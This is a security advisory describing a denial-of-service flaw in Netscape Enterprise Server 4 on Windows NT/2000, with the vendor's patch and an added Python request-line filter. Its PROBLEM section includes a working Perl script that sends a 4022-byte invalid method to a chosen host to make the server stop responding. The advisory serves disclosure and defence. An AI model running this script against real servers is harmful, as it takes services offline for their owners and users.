COMMAND

    Netscape Enterprise Server

SYSTEMS AFFECTED

    Netscape Enterprise Server 4/SP7 (possibly 4/SP3-SP7) running on Windows NT and Win2k

PROBLEM

    The following is based on a Digizen Security Group advisory. By
    sending a request with an invalid method or URI of 4022 bytes, an
    attacker can cause Netscape Enterprise Server to stop responding
    to requests.

    The code:

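    #!/usr/bin/perl
    # Sends one request whose method token is 4022 bytes long, waits,
    # then connects again to see whether the server still answers.
    use IO::Socket;

    if (@ARGV < 2) {
        print "Usage: host port\n";
        exit;
    }
    $overflow = "A" x 4022;    # 4022-byte invalid method
    &connect;
    sleep(15);
    &connect;                  # second connection: checks for a response
    exit;
    ################################################
    sub connect() {
        $sock = IO::Socket::INET->new(Proto    => "tcp",
                                      PeerAddr => $ARGV[0],
                                      PeerPort => $ARGV[1])
            or die "Can't connect to $ARGV[0]: $!\n";
        $sock->autoflush(1);
        print $sock "$overflow /index.html HTTP/1.0\n\n";
        # Print the status line, then the rest of the reply
        $response = <$sock>;
        print "$response";
        while (<$sock>) {
            print "$_\n";
        }
        close $sock;
    }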

SOLUTION

    To ensure the stability of our customers' environments iPlanet has
    made available an NSAPI patch that can be applied to iPlanet Web
    Server, Enterprise Edition version 4.1 Service Packs 3 through 7.
    The NSAPI patch is available at

        http://www.iplanet.com/products/iplanet_web_enterprise/iwsalert5.11.html

    This issue will also be addressed by the release of iPlanet Web
    Server, Enterprise Edition version 4.1 Service Pack 8.
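
    Added example, not part of the advisory and not the vendor's NSAPI
    patch: a request-line check for a filter or proxy placed in front of
    an unpatched server, rejecting the oversized method or URI described
    under PROBLEM before it is forwarded. The limits, the method list and
    all function names are assumptions chosen for this sketch.

```python
import io
import re

# Limits are assumptions for this example, not values taken from the
# advisory or from the iPlanet NSAPI patch.
MAX_LINE = 2048    # bytes allowed before the line terminator must appear
MAX_METHOD = 16    # longest method token accepted
KNOWN_METHODS = {"GET", "HEAD", "POST", "PUT", "DELETE", "OPTIONS", "TRACE"}
VERSION_RE = re.compile(r"HTTP/\d\.\d")


def read_request_line(stream, limit=MAX_LINE):
    """Read one line without buffering more than limit + 1 bytes."""
    line = stream.readline(limit + 1)
    if len(line) > limit or not line.endswith(b"\n"):
        return None  # oversized, or the peer never sent a terminator
    return line


def check_request(stream):
    """Return (accepted, reason) for the request line at the head of stream."""
    line = read_request_line(stream)
    if line is None:
        return False, "request line too long or unterminated"
    parts = line.decode("latin-1").rstrip("\r\n").split(" ")
    if len(parts) != 3:
        return False, "malformed request line"
    method, _uri, version = parts
    if len(method) > MAX_METHOD:
        return False, "method too long"
    if method not in KNOWN_METHODS:
        return False, "unknown method"
    if not VERSION_RE.fullmatch(version):
        return False, "bad HTTP version"
    return True, "ok"


# Constructed sample requests (not captured traffic).
SAMPLES = {
    "normal": b"GET /index.html HTTP/1.0\n\n",
    "long method": b"A" * 4022 + b" /index.html HTTP/1.0\n\n",
    "long URI": b"GET /" + b"A" * 4022 + b" HTTP/1.0\n\n",
    "odd method": b"A" * 100 + b" /index.html HTTP/1.0\n\n",
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(name, check_request(io.BytesIO(raw)))
```

    The length cap is enforced while reading, so an oversized request
    line is dropped without ever being buffered in full.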